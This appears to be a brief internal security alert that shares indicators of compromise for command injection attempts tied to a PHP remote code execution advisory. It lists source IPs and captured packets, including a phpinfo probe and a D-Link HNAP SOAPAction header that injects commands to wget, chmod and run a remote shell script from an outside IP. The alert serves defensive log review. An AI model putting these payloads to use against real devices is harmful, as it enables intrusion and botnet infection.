
We're seeing evidence of command injection attempts, likely exploitation of this 0-day sent out by MS-ISAC. MS-ISAC CYBERSECURITY ADVISORY - Multiple Vulnerabilities in PHP Could Allow for Remote Code Execution - PATCH NOW - TLP: CLEAR (cisecurity.org) https://learn.cisecurity.org/webmail/799323/2287372849/ae8748c409eb66ac8699d6f8c46cb6c049f8310d7514b3f7ef293982cfee61d1
Please check the logs of any servers that might be affected for these IOCs.
Source IPs: 154.6.147.208, 104.192.1.166, 45.90.163.19
RCE Payload (packet text, non-printable header bytes omitted):
<?php phpinfo(); ?>

Packet Text (non-printable header bytes omitted):
path=/2xMhQtOP/test&_variables=%7B%22_metadata%22%3A%7B%22classname%22%3A%22ws/test.xml%22%7D%2C%22_variables%22%3A%7B%7D%7D

Packet Text (non-printable header bytes omitted):
Host: 137.190.21.9:80 http://137.190.21.9/
User-Agent: Mozila/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings/%60cd http://purenetworks.com/HNAP1/GetDeviceSettings/cd && cd tmp && export PATH=$PATH:. && cd /tmp;wget http://146.19.191.205/a/wget.sh;chmod 777 wget.sh;sh wget.sh selfrep.dlink;rm -rf wget.sh`"
Content-Length: 0